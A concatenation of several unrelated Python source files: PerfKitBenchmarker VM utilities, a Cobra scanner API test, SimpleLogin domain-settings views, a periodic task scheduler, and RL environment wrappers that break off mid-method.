flags.DEFINE_enum('background_network_ip_type', IpAddressSubset.EXTERNAL,
(IpAddressSubset.INTERNAL, IpAddressSubset.EXTERNAL),
'IP address type to use when generating background network '
'traffic')
def GetTempDir():
"""Returns the tmp dir of the current run."""
return temp_dir.GetRunDirPath()
def PrependTempDir(file_name):
"""Returns the file name prepended with the tmp dir of the current run."""
return os.path.join(GetTempDir(), file_name)
def GenTempDir():
"""Creates the tmp dir for the current run if it does not already exist."""
temp_dir.CreateTemporaryDirectories()
def SSHKeyGen():
"""Create PerfKitBenchmarker SSH keys in the tmp dir of the current run."""
if not os.path.isdir(GetTempDir()):
GenTempDir()
if not os.path.isfile(GetPrivateKeyPath()):
create_cmd = ['ssh-keygen',
'-t',
'rsa',
'-N',
'',
'-q',
'-f',
PrependTempDir(PRIVATE_KEYFILE)]
shell_value = RunningOnWindows()
create_process = subprocess.Popen(create_cmd,
shell=shell_value,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
create_process.communicate()
if not os.path.isfile(GetCertPath()):
create_cmd = ['openssl',
'req',
'-x509',
'-new',
'-out',
PrependTempDir(CERT_FILE),
'-key',
PrependTempDir(PRIVATE_KEYFILE)]
shell_value = RunningOnWindows()
create_process = subprocess.Popen(create_cmd,
shell=shell_value,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
create_process.communicate(input='\n' * 7)
def GetPrivateKeyPath():
return PrependTempDir(PRIVATE_KEYFILE)
def GetPublicKeyPath():
return PrependTempDir(PUBLIC_KEYFILE)
def GetCertPath():
return PrependTempDir(CERT_FILE)
def GetSshOptions(ssh_key_filename, connect_timeout=5):
"""Return common set of SSH and SCP options."""
options = [
'-2',
'-o', 'UserKnownHostsFile=/dev/null',
'-o', 'StrictHostKeyChecking=no',
'-o', 'IdentitiesOnly=yes',
'-o', 'PreferredAuthentications=publickey',
'-o', 'PasswordAuthentication=no',
'-o', 'ConnectTimeout=%d' % connect_timeout,
'-o', 'GSSAPIAuthentication=no',
'-o', 'ServerAliveInterval=%d' % FLAGS.ssh_server_alive_interval,
'-o', 'ServerAliveCountMax=%d' % FLAGS.ssh_server_alive_count_max,
'-i', ssh_key_filename
]
if FLAGS.use_ipv6:
options.append('-6')
if FLAGS.ssh_reuse_connections:
control_path = os.path.join(temp_dir.GetSshConnectionsDir(), '%C')
options.extend([
'-o', 'ControlPath="%s"' % control_path,
'-o', 'ControlMaster=auto',
'-o', 'ControlPersist=10m'
])
options.extend(FLAGS.ssh_options)
return options
# TODO(skschneider): Remove at least RunParallelProcesses and RunParallelThreads
# from this file (update references to call directly into background_tasks).
RunParallelProcesses = background_tasks.RunParallelProcesses
RunParallelThreads = background_tasks.RunParallelThreads
RunThreaded = background_tasks.RunThreaded
def Retry(poll_interval=POLL_INTERVAL, max_retries=MAX_RETRIES,
timeout=None, fuzz=FUZZ, log_errors=True,
retryable_exceptions=None):
"""A function decorator that will retry when exceptions are thrown.
Args:
poll_interval: The time between tries in seconds. This is the maximum poll
interval when fuzz is specified.
max_retries: The maximum number of retries before giving up. If -1, this
means continue until the timeout is reached. The function will stop
retrying when either max_retries is met or timeout is reached.
timeout: The timeout for all tries in seconds. If -1, this means continue
until max_retries is met. The function will stop retrying when either
max_retries is met or timeout is reached.
fuzz: The amount of randomness in the sleep time. This is used to
keep threads from all retrying at the same time. At 0, this
means sleep exactly poll_interval seconds. At 1, this means
sleep anywhere from 0 to poll_interval seconds.
log_errors: A boolean describing whether errors should be logged.
retryable_exceptions: A tuple of exceptions that should be retried. By
default, this is None, which indicates that all exceptions should
be retried.
Returns:
A function that wraps functions in retry logic. It can be
used as a decorator.
"""
if retryable_exceptions is None:
retryable_exceptions = Exception
def Wrap(f):
"""Wraps the supplied function with retry logic."""
def WrappedFunction(*args, **kwargs):
"""Holds the retry logic."""
local_timeout = FLAGS.default_timeout if timeout is None else timeout
if local_timeout >= 0:
deadline = time.time() + local_timeout
else:
deadline = float('inf')
tries = 0
while True:
try:
tries += 1
return f(*args, **kwargs)
except retryable_exceptions as e:
fuzz_multiplier = 1 - fuzz + random.random() * fuzz
sleep_time = poll_interval * fuzz_multiplier
if ((time.time() + sleep_time) >= deadline or
(max_retries >= 0 and tries > max_retries)):
raise
else:
if log_errors:
logging.info('Retrying exception running %s: %s', f.__name__, e)
time.sleep(sleep_time)
return WrappedFunction
return Wrap
def IssueCommand(cmd, force_info_log=False, suppress_warning=False,
env=None, timeout=DEFAULT_TIMEOUT, cwd=None):
"""Tries running the provided command once.
Args:
cmd: A list of strings such as is given to the subprocess.Popen()
constructor.
force_info_log: A boolean indicating whether the command result should
always be logged at the info level. Command results will always be
logged at the debug level if they aren't logged at another level.
suppress_warning: A boolean indicating whether the results should
not be logged at the info level in the event of a non-zero
return code. When force_info_log is True, the output is logged
regardless of suppress_warning's value.
env: A dict of key/value strings, such as is given to the subprocess.Popen()
constructor, that contains environment variables to be injected.
timeout: Timeout for the command in seconds. If the command has not finished
before the timeout is reached, it will be killed. Set timeout to None to
let the command run indefinitely. If the subprocess is killed, the
return code will indicate an error, and stdout and stderr will
contain what had already been written to them before the process was
killed.
cwd: Directory in which to execute the command.
Returns:
A tuple of stdout, stderr, and retcode from running the provided command.
"""
if env:
logging.debug('Environment variables: %s', env)
full_cmd = ' '.join(cmd)
logging.info('Running: %s', full_cmd)
time_file_path = '/usr/bin/time'
running_on_windows = RunningOnWindows()
running_on_darwin = RunningOnDarwin()
should_time = (not (running_on_windows or running_on_darwin) and
os.path.isfile(time_file_path) and FLAGS.time_commands)
shell_value = running_on_windows
with tempfile.TemporaryFile() as tf_out, \
tempfile.TemporaryFile() as tf_err, \
tempfile.NamedTemporaryFile(mode='r') as tf_timing:
cmd_to_use = cmd
if should_time:
cmd_to_use = [time_file_path,
'-o', tf_timing.name,
'--quiet',
'-f', ', WallTime:%Es, CPU:%Us, MaxMemory:%Mkb '] + cmd
process = subprocess.Popen(cmd_to_use, env=env, shell=shell_value,
stdin=subprocess.PIPE, stdout=tf_out,
stderr=tf_err, cwd=cwd)
def _KillProcess():
logging.error('IssueCommand timed out after %d seconds. '
'Killing command "%s".', timeout, full_cmd)
process.kill()
timer = threading.Timer(timeout, _KillProcess)
timer.start()
try:
process.wait()
finally:
timer.cancel()
tf_out.seek(0)
stdout = tf_out.read().decode('ascii', 'ignore')
tf_err.seek(0)
stderr = tf_err.read().decode('ascii', 'ignore')
timing_output = ''
if should_time:
timing_output = tf_timing.read().rstrip('\n')
debug_text = ('Ran: {%s} ReturnCode:%s%s\nSTDOUT: %s\nSTDERR: %s' %
(full_cmd, process.returncode, timing_output, stdout, stderr))
if force_info_log or (process.returncode and not suppress_warning):
logging.info(debug_text)
else:
logging.debug(debug_text)
return stdout, stderr, process.returncode
def IssueBackgroundCommand(cmd, stdout_path, stderr_path, env=None):
"""Run the provided command once in the background.
Args:
cmd: Command to be run, as expected by subprocess.Popen.
stdout_path: Redirect stdout here. Overwritten.
stderr_path: Redirect stderr here. Overwritten.
env: A dict of key/value strings, such as is given to the subprocess.Popen()
constructor, that contains environment variables to be injected.
"""
logging.debug('Environment variables: %s', env)
full_cmd = ' '.join(cmd)
logging.info('Spawning: %s', full_cmd)
outfile = open(stdout_path, 'w')
errfile = open(stderr_path, 'w')
shell_value = RunningOnWindows()
subprocess.Popen(cmd, env=env, shell=shell_value,
stdout=outfile, stderr=errfile, close_fds=True)
@Retry()
def IssueRetryableCommand(cmd, env=None):
"""Tries running the provided command until it succeeds or times out.
Args:
cmd: A list of strings such as is given to the subprocess.Popen()
constructor.
env: An alternate environment to pass to the Popen command.
Returns:
A tuple of stdout and stderr from running the provided command.
"""
stdout, stderr, retcode = IssueCommand(cmd, env=env)
if retcode:
raise errors.VmUtil.CalledProcessException(
'Command returned a non-zero exit code.\n')
return stdout, stderr
def ParseTimeCommandResult(command_result):
"""Parse command result and get time elapsed.
Note this parses the output of bash's time builtin, not /usr/bin/time or other
implementations. You may need to run something like bash -c "time ./command"
to produce parseable output.
Args:
command_result: The result after executing a remote time command.
Returns:
Time taken for the command.
"""
time_data = re.findall(r'real\s+(\d+)m(\d+.\d+)', command_result)
time_in_seconds = 60 * float(time_data[0][0]) + float(time_data[0][1])
return time_in_seconds
def ShouldRunOnExternalIpAddress(ip_type=None):
"""Returns whether a test should be run on an instance's external IP."""
ip_type_to_check = ip_type or FLAGS.ip_addresses
return ip_type_to_check in (IpAddressSubset.EXTERNAL, IpAddressSubset.BOTH,
IpAddressSubset.REACHABLE)
def ShouldRunOnInternalIpAddress(sending_vm, receiving_vm, ip_type=None):
"""Returns whether a test should be run on an instance's internal IP.
Based on the command line flag --ip_addresses. Internal IP addresses are used
when:
* --ip_addresses=BOTH or --ip-addresses=INTERNAL
* --ip_addresses=REACHABLE and 'sending_vm' can ping 'receiving_vm' on its
internal IP.
Args:
sending_vm: VirtualMachine. The client.
receiving_vm: VirtualMachine. The server.
ip_type: optional ip_type to use instead of what is set in the FLAGS
Returns:
Whether a test should be run on an instance's internal IP.
"""
ip_type_to_check = ip_type or FLAGS.ip_addresses
return (ip_type_to_check in (IpAddressSubset.BOTH, IpAddressSubset.INTERNAL)
or (ip_type_to_check == IpAddressSubset.REACHABLE and
sending_vm.IsReachable(receiving_vm)))
def GetLastRunUri():
"""Returns the last run_uri used (or None if it can't be determined)."""
runs_dir_path = temp_dir.GetAllRunsDirPath()
try:
dir_names = next(os.walk(runs_dir_path))[1]
except StopIteration:
# The runs directory was not found.
return None
if not dir_names:
# No run subdirectories were found in the runs directory.
return None
# Return the subdirectory with the most recent modification time.
return max(dir_names,
key=lambda d: os.path.getmtime(os.path.join(runs_dir_path, d)))
@contextlib.contextmanager
def NamedTemporaryFile(prefix='tmp', suffix='', dir=None, delete=True):
"""Behaves like tempfile.NamedTemporaryFile.
The existing tempfile.NamedTemporaryFile has the annoying property on
Windows that it cannot be opened a second time while it is already open.
This makes it impossible to use it with a "with" statement in a cross platform
compatible way. This serves a similar role, but allows the file to be closed
within a "with" statement without causing the file to be unlinked until the
context exits.
"""
f = tempfile.NamedTemporaryFile(prefix=prefix, suffix=suffix,
dir=dir, delete=False)
try:
yield f
finally:
if not f.closed:
f.close()
if delete:
os.unlink(f.name)
def GenerateSSHConfig(vms, vm_groups):
"""Generates an SSH config file to simplify connecting to the specified VMs.
Writes a file to GetTempDir()/ssh_config with an SSH configuration for each VM
provided in the arguments. Users can then SSH with any of the following:
ssh -F <ssh_config_path> <vm_name>
ssh -F <ssh_config_path> vm<vm_index>
ssh -F <ssh_config_path> <group_name>-<index>
Args:
vms: list of BaseVirtualMachines.
vm_groups: dict mapping VM group name string to list of BaseVirtualMachines.
"""
target_file = os.path.join(GetTempDir(), 'ssh_config')
template_path = data.ResourcePath('ssh_config.j2')
environment = jinja2.Environment(undefined=jinja2.StrictUndefined)
with open(template_path) as fp:
template = environment.from_string(fp.read())
with open(target_file, 'w') as ofp:
ofp.write(template.render({'vms': vms, 'vm_groups': vm_groups}))
ssh_options = [' ssh -F {0} {1}'.format(target_file, pattern)
for pattern in ('<vm_name>', 'vm<index>',
'<group_name>-<index>')]
logging.info('ssh to VMs in this benchmark by name with:\n%s',
'\n'.join(ssh_options))
def RunningOnWindows():
"""Returns True if PKB is running on Windows."""
return os.name == WINDOWS
def RunningOnDarwin():
"""Returns True if PKB is running on a Darwin OS machine."""
return os.name != WINDOWS and platform.system() == DARWIN
def ExecutableOnPath(executable_name):
"""Return True if the given executable can be found on the path."""
cmd = ['where'] if RunningOnWindows() else ['which']
cmd.append(executable_name)
shell_value = RunningOnWindows()
process = subprocess.Popen(cmd,
shell=shell_value,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
process.communicate()
if process.returncode:
return False
return True
def GenerateRandomWindowsPassword(password_length=PASSWORD_LENGTH):
"""Generates a password that meets Windows complexity requirements."""
# The special characters have to be recognized by the Azure CLI as
# special characters. This greatly limits the set of characters
# that we can safely use. See
# https://github.com/Azure/azure-xplat-cli/blob/master/lib/commands/arm/vm/vmOsProfile._js#L145
special_chars = '*!@#$%+='
# Ensure that the password contains at least one of each 4 required
# character types starting with letters to avoid starting with chars which
# are problematic on the command line e.g. @.
prefix = [random.choice(string.ascii_lowercase),
random.choice(string.ascii_uppercase),
random.choice(string.digits),
random.choice(special_chars)]
password = [
random.choice(string.ascii_letters + string.digits + special_chars)
for _ in range(password_length - 4)]
return ''.join(prefix + password)
def StartSimulatedMaintenance():
"""Initiates the simulated maintenance event."""
if FLAGS.simulate_maintenance:
_SIMULATE_MAINTENANCE_SEMAPHORE.release()
def SetupSimulatedMaintenance(vm):
"""Called ready VM for simulated maintenance."""
if FLAGS.simulate_maintenance:
def _SimulateMaintenance():
_SIMULATE_MAINTENANCE_SEMAPHORE.acquire()
time.sleep(FLAGS.simulate_maintenance_delay)
vm.SimulateMaintenanceEvent()
t = threading.Thread(target=_SimulateMaintenance)
t.daemon = True
t.start()
def CopyFileBetweenVms(filename, src_vm, src_path, dest_vm, dest_path):
"""Copies a file from the src_vm to the dest_vm."""
with tempfile.NamedTemporaryFile() as tf:
temp_path = tf.name
src_vm.RemoteCopy(
temp_path, os.path.join(src_path, filename), copy_to=False)
dest_vm.RemoteCopy(
temp_path, os.path.join(dest_path, filename), copy_to=True)
|
test_apiserver.py
|
# -*- coding: utf-8 -*-
"""
tests.apiserver
~~~~~~~~~~~~
Tests cobra.api
:author: 40huo <git@40huo.cn>
:homepage: https://github.com/wufeifei/cobra
:license: MIT, see LICENSE for more details.
:copyright: Copyright (c) 2017 Feei. All rights reserved
"""
import json
import multiprocessing
import os
import shutil
import socket
import time
import requests
from cobra.api import start
from cobra.config import project_directory, running_path
p = multiprocessing.Process(target=start, args=('127.0.0.1', 5000, False))
p.start()
time.sleep(1)
config_path = os.path.join(project_directory, 'config')
template_path = os.path.join(project_directory, 'config.template')
shutil.copyfile(template_path, config_path)
a_sid = ''
s_sid = ''
def test_add_job():
url = "http://127.0.0.1:5000/api/add"
post_data = {
"key": "your_secret_key",
"target": [os.path.join(project_directory, 'tests/vulnerabilities')]
}
headers = {
"Content-Type": "application/json",
}
re = requests.post(url=url, data=json.dumps(post_data), headers=headers)
result = json.loads(re.text)
global a_sid
a_sid = result.get('result').get('sid')
a_sid_file = os.path.join(running_path, '{sid}_list'.format(sid=a_sid))
# wait writing scan_list
while True:
with open(a_sid_file, 'r') as f:
scan_list = json.load(f)
print(scan_list)
if len(scan_list.get('sids')) > 0:
break
time.sleep(0.1)
global s_sid
s_sid = list(scan_list.get('sids').keys())[0]
assert "1001" in re.text
assert "Add scan job successfully" in re.text
assert "sid" in re.text
def test_job_status():
url = "http://127.0.0.1:5000/api/status"
post_data = {
"key": "your_secret_key",
"sid": a_sid,
}
headers = {
"Content-Type": "application/json",
}
re = requests.post(url=url, data=json.dumps(post_data), headers=headers)
assert "1001" in re.text
assert "msg" in re.text
assert a_sid in re.text
assert "status" in re.text
assert "report" in re.text
def test_result_data():
url = 'http://127.0.0.1:5000/api/list'
post_data = {
'sid': s_sid,
}
headers = {
"Content-Type": "application/json",
}
re = requests.post(url=url, data=json.dumps(post_data), headers=headers)
s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid))
if os.path.exists(s_sid_file):
assert '1001' in re.text
assert 'result' in re.text
assert 'rule_filter' in re.text
else:
assert '1002' in re.text
assert 'No such target' in re.text
def test_result_detail():
url = 'http://127.0.0.1:5000/api/detail'
post_data = {
'sid': s_sid,
'file_path': 'v.php',
}
headers = {
"Content-Type": "application/json",
}
re = requests.post(url=url, data=json.dumps(post_data), headers=headers)
s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid))
if os.path.exists(s_sid_file):
assert '1001' in re.text
assert 'file_content' in re.text
else:
assert '1002' in re.text
assert 'No such target' in re.text
def test_index():
url = 'http://127.0.0.1:5000/'
re = requests.get(url=url)
assert 'Github / Gitlab' in re.text
url = 'http://127.0.0.1:5000/?sid=abcde'
re = requests.get(url=url)
assert 'scan id does not exist!' in re.text
def test_close_api():
os.remove(config_path)
p.terminate()
p.join()
# wait for scan data
s_sid_file = os.path.join(running_path, '{sid}_data'.format(sid=s_sid))
while not os.path.exists(s_sid_file):
time.sleep(1)
# wait for port closed
s = socket.socket()
s.settimeout(0.5)
while s.connect_ex(('localhost', 5000)) == 0:
time.sleep(0.5)
assert not os.path.exists(config_path)
|
domain_detail.py
|
from threading import Thread
from flask import render_template, request, redirect, url_for, flash
from flask_login import login_required, current_user
from app.config import EMAIL_SERVERS_WITH_PRIORITY, EMAIL_DOMAIN
from app.dashboard.base import dashboard_bp
from app.dns_utils import (
get_mx_domains,
get_spf_domain,
get_txt_record,
get_cname_record,
)
from app.email_utils import send_email
from app.extensions import db
from app.log import LOG
from app.models import CustomDomain, Alias, DomainDeletedAlias
@dashboard_bp.route("/domains/<int:custom_domain_id>/dns", methods=["GET", "POST"])
@login_required
def domain_detail_dns(custom_domain_id):
custom_domain = CustomDomain.get(custom_domain_id)
if not custom_domain or custom_domain.user_id != current_user.id:
flash("You cannot see this page", "warning")
return redirect(url_for("dashboard.index"))
spf_record = f"v=spf1 include:{EMAIL_DOMAIN} -all"
# hardcode the DKIM selector here
dkim_cname = f"dkim._domainkey.{EMAIL_DOMAIN}"
dmarc_record = "v=DMARC1; p=quarantine; pct=100; adkim=s; aspf=s"
mx_ok = spf_ok = dkim_ok = dmarc_ok = True
mx_errors = spf_errors = dkim_errors = dmarc_errors = []
if request.method == "POST":
if request.form.get("form-name") == "check-mx":
mx_domains = get_mx_domains(custom_domain.domain)
if sorted(mx_domains) != sorted(EMAIL_SERVERS_WITH_PRIORITY):
flash("The MX record is not correctly set", "warning")
mx_ok = False
# build mx_errors to show to user
mx_errors = [
f"{priority} {domain}" for (priority, domain) in mx_domains
]
else:
flash(
"Your domain can start receiving emails. You can now use it to create alias",
"success",
)
custom_domain.verified = True
db.session.commit()
return redirect(
url_for(
"dashboard.domain_detail_dns", custom_domain_id=custom_domain.id
)
)
elif request.form.get("form-name") == "check-spf":
spf_domains = get_spf_domain(custom_domain.domain)
if EMAIL_DOMAIN in spf_domains:
custom_domain.spf_verified = True
db.session.commit()
flash("SPF is setup correctly", "success")
return redirect(
url_for(
"dashboard.domain_detail_dns", custom_domain_id=custom_domain.id
)
)
else:
custom_domain.spf_verified = False
db.session.commit()
flash(
f"SPF: {EMAIL_DOMAIN} is not included in your SPF record.",
"warning",
)
spf_ok = False
spf_errors = get_txt_record(custom_domain.domain)
elif request.form.get("form-name") == "check-dkim":
dkim_record = get_cname_record("dkim._domainkey." + custom_domain.domain)
if dkim_record == dkim_cname:
flash("DKIM is setup correctly.", "success")
custom_domain.dkim_verified = True
db.session.commit()
return redirect(
url_for(
"dashboard.domain_detail_dns", custom_domain_id=custom_domain.id
)
)
else:
custom_domain.dkim_verified = False
db.session.commit()
flash("DKIM: the CNAME record is not correctly set", "warning")
dkim_ok = False
dkim_errors = [dkim_record or "[Empty]"]
elif request.form.get("form-name") == "check-dmarc":
txt_records = get_txt_record("_dmarc." + custom_domain.domain)
if dmarc_record in txt_records:
custom_domain.dmarc_verified = True
db.session.commit()
flash("DMARC is setup correctly", "success")
return redirect(
url_for(
"dashboard.domain_detail_dns", custom_domain_id=custom_domain.id
)
)
else:
custom_domain.dmarc_verified = False
db.session.commit()
flash(
f"DMARC: The TXT record is not correctly set",
"warning",
)
dmarc_ok = False
dmarc_errors = txt_records
return render_template(
"dashboard/domain_detail/dns.html",
EMAIL_SERVERS_WITH_PRIORITY=EMAIL_SERVERS_WITH_PRIORITY,
**locals(),
)
@dashboard_bp.route("/domains/<int:custom_domain_id>/info", methods=["GET", "POST"])
@login_required
def domain_detail(custom_domain_id):
custom_domain = CustomDomain.get(custom_domain_id)
if not custom_domain or custom_domain.user_id != current_user.id:
flash("You cannot see this page", "warning")
return redirect(url_for("dashboard.index"))
if request.method == "POST":
if request.form.get("form-name") == "switch-catch-all":
custom_domain.catch_all = not custom_domain.catch_all
db.session.commit()
if custom_domain.catch_all:
flash(
f"The catch-all has been enabled for {custom_domain.domain}",
"success",
)
else:
flash(
f"The catch-all has been disabled for {custom_domain.domain}",
"warning",
)
return redirect(
url_for("dashboard.domain_detail", custom_domain_id=custom_domain.id)
)
elif request.form.get("form-name") == "set-name":
custom_domain.name = request.form.get("alias-name").replace("\n", "")
db.session.commit()
flash(
f"Default alias name for Domain {custom_domain.domain} has been set",
"success",
)
return redirect(
url_for("dashboard.domain_detail", custom_domain_id=custom_domain.id)
)
elif request.form.get("form-name") == "switch-random-prefix-generation":
custom_domain.random_prefix_generation = (
not custom_domain.random_prefix_generation
)
db.session.commit()
if custom_domain.random_prefix_generation:
flash(
f"Random prefix generation has been enabled for {custom_domain.domain}",
"success",
)
else:
flash(
f"Random prefix generation has been disabled for {custom_domain.domain}",
"warning",
)
return redirect(
url_for("dashboard.domain_detail", custom_domain_id=custom_domain.id)
)
elif request.form.get("form-name") == "delete":
name = custom_domain.domain
LOG.d("Schedule deleting %s", custom_domain)
Thread(target=delete_domain, args=(custom_domain_id,)).start()
flash(
f"{name} scheduled for deletion."
f"You will receive a confirmation email when the deletion is finished",
"success",
)
return redirect(url_for("dashboard.custom_domain"))
nb_alias = Alias.filter_by(custom_domain_id=custom_domain.id).count()
return render_template("dashboard/domain_detail/info.html", **locals())
def delete_domain(custom_domain_id: CustomDomain):
from server import create_light_app
with create_light_app().app_context():
custom_domain = CustomDomain.get(custom_domain_id)
if not custom_domain:
return
domain_name = custom_domain.domain
user = custom_domain.user
CustomDomain.delete(custom_domain.id)
db.session.commit()
LOG.d("Domain %s deleted", domain_name)
send_email(
user.email,
f"Your domain {domain_name} has been deleted",
f"""Domain {domain_name} along with its aliases are deleted successfully.
Regards,
SimpleLogin team.
""",
)
@dashboard_bp.route("/domains/<int:custom_domain_id>/trash", methods=["GET", "POST"])
@login_required
def domain_detail_trash(custom_domain_id):
custom_domain = CustomDomain.get(custom_domain_id)
if not custom_domain or custom_domain.user_id != current_user.id:
flash("You cannot see this page", "warning")
return redirect(url_for("dashboard.index"))
if request.method == "POST":
if request.form.get("form-name") == "empty-all":
DomainDeletedAlias.filter_by(domain_id=custom_domain.id).delete()
db.session.commit()
flash("All deleted aliases can now be re-created", "success")
return redirect(
url_for(
"dashboard.domain_detail_trash", custom_domain_id=custom_domain.id
)
)
elif request.form.get("form-name") == "remove-single":
deleted_alias_id = request.form.get("deleted-alias-id")
deleted_alias = DomainDeletedAlias.get(deleted_alias_id)
if not deleted_alias or deleted_alias.domain_id != custom_domain.id:
flash("Unknown error, refresh the page", "warning")
return redirect(
url_for(
"dashboard.domain_detail_trash",
custom_domain_id=custom_domain.id,
)
)
DomainDeletedAlias.delete(deleted_alias.id)
db.session.commit()
flash(
f"{deleted_alias.email} can now be re-created",
"success",
)
return redirect(
url_for(
"dashboard.domain_detail_trash", custom_domain_id=custom_domain.id
)
)
domain_deleted_aliases = DomainDeletedAlias.filter_by(
domain_id=custom_domain.id
).all()
return render_template(
"dashboard/domain_detail/trash.html",
domain_deleted_aliases=domain_deleted_aliases,
custom_domain=custom_domain,
)
|
periodic.py
|
# Copyright 2019 Iguazio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from threading import Thread
from time import monotonic, sleep
from ..utils import logger
class Task:
# @yaronha - Add initializtion here
def __init__(self):
pass
def run(self):
# @yaronha - Add code here
pass
def _schedule(task: Task, delay_seconds):
while True:
start = monotonic()
try:
try:
task.run()
except Exception as err:
logger.exception('task error - %s', err)
except Exception:
pass
duration = monotonic() - start
sleep_time = max(delay_seconds - duration, 0)
sleep(sleep_time)
def schedule(task: Task, delay_seconds):
"""Run task.run every delay_seconds in a background thread"""
thr = Thread(target=_schedule, args=(task, delay_seconds), daemon=True)
thr.start()
return thr
|
wrappers.py
|
import atexit
import functools
import sys
import threading
import traceback
import gym
import numpy as np
from PIL import Image
import cv2
import pybullet
import pybullet_envs
class DeepMindControl:
def __init__(self, name, size=(64, 64), camera=None):
domain, task = name.split('_', 1)
if domain == 'cup': # Only domain with multiple words.
domain = 'ball_in_cup'
if isinstance(domain, str):
from dm_control import suite
self._env = suite.load(domain, task)
else:
assert task is None
self._env = domain()
self._size = size
if camera is None:
camera = dict(quadruped=2).get(domain, 0)
self._camera = camera
@property
def observation_space(self):
spaces = {}
for key, value in self._env.observation_spec().items():
spaces[key] = gym.spaces.Box(
-np.inf, np.inf, value.shape, dtype=np.float32)
spaces['image'] = gym.spaces.Box(
0, 255, self._size + (3,), dtype=np.uint8)
return gym.spaces.Dict(spaces)
@property
def action_space(self):
spec = self._env.action_spec()
return gym.spaces.Box(spec.minimum, spec.maximum, dtype=np.float32)
def step(self, action):
time_step = self._env.step(action)
obs = dict(time_step.observation)
obs['image'] = self.render()
reward = time_step.reward or 0
done = time_step.last()
info = {'discount': np.array(time_step.discount, np.float32)}
return obs, reward, done, info
def reset(self):
time_step = self._env.reset()
obs = dict(time_step.observation)
obs['image'] = self.render()
return obs
def render(self, *args, **kwargs):
if kwargs.get('mode', 'rgb_array') != 'rgb_array':
raise ValueError("Only render mode 'rgb_array' is supported.")
return self._env.physics.render(*self._size, camera_id=self._camera)
class Bullet:
def __init__(self, env_name):
self.env = gym.make(env_name)
self.action_space = self.env.action_space
self.observation_space = gym.spaces.Dict({"image": gym.spaces.Box(0, 255, (64, 64, 3), dtype=np.uint8)})
self.steps_ctn = 0
def step(self, action):
reward = 0
for _ in range(2):
_, r, done, info = self.env.step(action)
self.steps_ctn += 1
observation = self.env.render("rgb_array")
observation = cv2.resize(observation, (64, 64), interpolation=cv2.INTER_LINEAR)
reward += r
if self.steps_ctn >= 1000:
done = True
observation = {"image": observation}
return observation, reward, done, info
observation = {"image": observation}
return observation, reward, done, info
def reset(self):
_ = self.env.reset()
observation = self.env.render("rgb_array")
observation = cv2.resize(observation, (64, 64), interpolation=cv2.INTER_LINEAR)
observation = {"image": observation}
self.steps_ctn = 0
return observation
def render(self, mode='human'):
return self.env.render(mode)
class Atari:
LOCK = threading.Lock()
def __init__(
self, name, action_repeat=4, size=(84, 84), grayscale=True, noops=30,
life_done=False, sticky_actions=True):
import gym
version = 0 if sticky_actions else 4
name = ''.join(word.title() for word in name.split('_'))
with self.LOCK:
self._env = gym.make('{}NoFrameskip-v{}'.format(name, version))
self._action_repeat = action_repeat
self._size = size
self._grayscale = grayscale
self._noops = noops
self._life_done = life_done
self._lives = None
shape = self._env.observation_space.shape[:2] + (() if grayscale else (3,))
self._buffers = [np.empty(shape, dtype=np.uint8) for _ in range(2)]
self._random = np.random.RandomState(seed=None)
@property
def observation_space(self):
shape = self._size + (1 if self._grayscale else 3,)
space = gym.spaces.Box(low=0, high=255, shape=shape, dtype=np.uint8)
return gym.spaces.Dict({'image': space})
@property
def action_space(self):
return self._env.action_space
def close(self):
return self._env.close()
def reset(self):
with self.LOCK:
self._env.reset()
noops = self._random.randint(1, self._noops + 1)
for _ in range(noops):
done = self._env.step(0)[2]
if done:
with self.LOCK:
self._env.reset()
self._lives = self._env.ale.lives()
if self._grayscale:
self._env.ale.getScreenGrayscale(self._buffers[0])
else:
self._env.ale.getScreenRGB2(self._buffers[0])
self._buffers[1].fill(0)
return self._get_obs()
def step(self, action):
total_reward = 0.0
for step in range(self._action_repeat):
_, reward, done, info = self._env.step(action)
total_reward += reward
if self._life_done:
lives = self._env.ale.lives()
done = done or lives < self._lives
self._lives = lives
if done:
break
elif step >= self._action_repeat - 2:
index = step - (self._action_repeat - 2)
if self._grayscale:
self._env.ale.getScreenGrayscale(self._buffers[index])
else:
self._env.ale.getScreenRGB2(self._buffers[index])
obs = self._get_obs()
return obs, total_reward, done, info
def render(self, mode):
return self._env.render(mode)
def _get_obs(self):
if self._action_repeat > 1:
np.maximum(self._buffers[0], self._buffers[1], out=self._buffers[0])
image = np.array(Image.fromarray(self._buffers[0]).resize(
self._size, Image.BILINEAR))
image = np.clip(image, 0, 255).astype(np.uint8)
image = image[:, :, None] if self._grayscale else image
return {'image': image}
class Collect:
def __init__(self, env, callbacks=None, precision=32):
self._env = env
self._callbacks = callbacks or ()
self._precision = precision
self._episode = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
obs, reward, done, info = self._env.step(action)
obs = {k: self._convert(v) for k, v in obs.items()}
transition = obs.copy()
transition['action'] = action
transition['reward'] = reward
transition['discount'] = info.get('discount', np.array(1 - float(done)))
self._episode.append(transition)
if done:
episode = {k: [t[k] for t in self._episode] for k in self._episode[0]}
episode = {k: self._convert(v) for k, v in episode.items()}
info['episode'] = episode
for callback in self._callbacks:
callback(episode)
return obs, reward, done, info
def reset(self):
obs = self._env.reset()
transition = obs.copy()
transition['action'] = np.zeros(self._env.action_space.shape)
transition['reward'] = 0.0
transition['discount'] = 1.0
self._episode = [transition]
return obs
def _convert(self, value):
value = np.array(value)
if np.issubdtype(value.dtype, np.floating):
dtype = {16: np.float16, 32: np.float32, 64: np.float64}[self._precision]
elif np.issubdtype(value.dtype, np.signedinteger):
dtype = {16: np.int16, 32: np.int32, 64: np.int64}[self._precision]
elif np.issubdtype(value.dtype, np.uint8):
dtype = np.uint8
else:
raise NotImplementedError(value.dtype)
return value.astype(dtype)
class TimeLimit:
def __init__(self, env, duration):
self._env = env
self._duration = duration
self._step = None
def __getattr__(self, name):
return getattr(self._env, name)
def step(self, action):
assert self._step is not None, 'Must reset environment.'
